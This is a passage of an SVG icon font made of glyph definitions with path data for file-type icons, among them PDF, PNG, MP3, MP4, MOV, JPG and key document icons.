<glyph unicode="&#xeccb;" glyph-name="document-file-numbers2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM416 384v-160h-32v224h32l96-160v160h32v-224h-32l-96 160zM704 448h32v-159.811c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v159.811h32v-159.906c0-17.725 14.165-32.094 31.967-32.094h32.067c17.655 0 31.967 14.012 31.967 32.094v159.906zM848 352l48 96h32v-224h-32v160l-32-64h-32l-32 64v-160h-32v224h32l48-96z" />
<glyph unicode="&#xeccc;" glyph-name="document-file-pages" d="M384 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM320 448.255c0 34.939 28.576 63.745 63.826 63.745h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511zM416 416h64.033c17.801 0 31.967-14.327 31.967-32 0-17.796-14.312-32-31.967-32h-64.033v64zM832.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM704 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xeccd;" glyph-name="document-file-pages2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM704 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM384 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM832.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xecce;" glyph-name="document-file-app" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM512 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM447.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM576 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM768 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xeccf;" glyph-name="document-file-app2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM512 320v-96h32v160c0 35.346-28.605 64-64.156 64h-31.688c-35.432 0-64.156-28.407-64.156-64v-160h32v96h96zM447.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM576 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM768 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecd0;" glyph-name="document-file-png" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM608 384v-160h-32v224h32l96-160v160h32v-224h-32l-96 160zM896 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xecd1;" glyph-name="document-file-png2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM608 384l96-160h32v224h-32v-160l-96 160h-32v-224h32v160zM896 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xecd2;" glyph-name="document-file-pdf" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM800 352v64h128v32h-160v-224h32v96h96v32h-96zM384 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM576 448h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM608 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033z" />
<glyph unicode="&#xecd3;" glyph-name="document-file-pdf2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM800 352v64h128v32h-160v-224h32v96h96v32h-96zM384 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM576 448v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM608 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033z" />
<glyph unicode="&#xecd4;" glyph-name="document-file-mp3" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM464 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM768 384c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64 0-19.214-8.37-36.334-21.648-48.021 13.292-11.727 21.648-28.875 21.648-47.979 0-35.593-28.724-64-64.156-64h-31.688c-35.551 0-64.156 28.654-64.156 64h32c0-17.673 14.165-32 31.967-32h32.067c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-32.033v32h32.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.204-31.967-32h-32zM576 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecd5;" glyph-name="document-file-mp32" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM464 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM768 384h32c0 17.796 14.312 32 31.967 32h32.067c17.801 0 31.967-14.327 31.967-32 0-17.796-14.312-32-31.967-32h-32.033v-32h32.033c17.801 0 31.967-14.327 31.967-32 0-17.796-14.312-32-31.967-32h-32.067c-17.801 0-31.967 14.327-31.967 32h-32c0-35.346 28.605-64 64.156-64h31.688c35.432 0 64.156 28.407 64.156 64 0 19.104-8.356 36.252-21.648 47.979 13.278 11.688 21.648 28.807 21.648 48.021 0 35.346-28.605 64-64.156 64h-31.688c-35.432 0-64.156-28.407-64.156-64zM576 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecd6;" glyph-name="document-file-mp4" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM864 320h-57.6l57.6 80v-80zM864 288v-64h32v64h32v32h-32v128h-32l-96-128v-32h96zM464 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM576 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecd7;" glyph-name="document-file-mp42" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM864 320v80l-57.6-80h57.6zM864 288v-64h32v64h32v32h-32v128h-32l-96-128v-32h96zM464 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM576 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecd8;" glyph-name="document-file-mov" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM640.156 448h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM639.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM464 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM848 280l48 168h32l-64-224h-32l-64 224h32l48-168z" />
<glyph unicode="&#xecd9;" glyph-name="document-file-mov2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM640.156 448c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM639.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM464 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM848 280l-48 168h-32l64-224h32l64 224h-32l-48-168z" />
<glyph unicode="&#xecda;" glyph-name="document-file-jpg" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 320v-31.811c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v159.811h-32v-160.295c0-17.274-14.312-31.705-31.967-31.705h-32.067c-17.801 0-31.967 14.327-31.967 32v32h-32zM576 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM896 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xecdb;" glyph-name="document-file-jpg2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 320v-31.811c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v159.811h-32v-160.295c0-17.274-14.312-31.705-31.967-31.705h-32.067c-17.801 0-31.967 14.327-31.967 32v32h-32zM576 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM896 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xecdc;" glyph-name="document-file-key" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM608 320v-64h128v-32h-160v224h160v-32h-128v-64h96v-32h-96zM416 310.4v-86.4h-32v224h32v-86.4l86.398 86.4h41.602l-112-112 112-112h-41.602l-86.398 86.4zM864 320v-96h-32v96l-64 96v32h32v-32l48-72 48 72v32h32v-32l-64-96z" />
<glyph unicode="&#xecdd;" glyph-name="document-file-key2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM608 320v-64h128v-32h-160v224h160v-32h-128v-64h96v-32h-96zM416 310.4v-86.4h-32v224h32v-86.4l86.398 86.4h41.602l-112-112 112-112h-41.602l-86.398 86.4zM864 320v-96h-32v96l-64 96v32h32v-32l48-72 48 72v32h32v-32l-64-96z" />
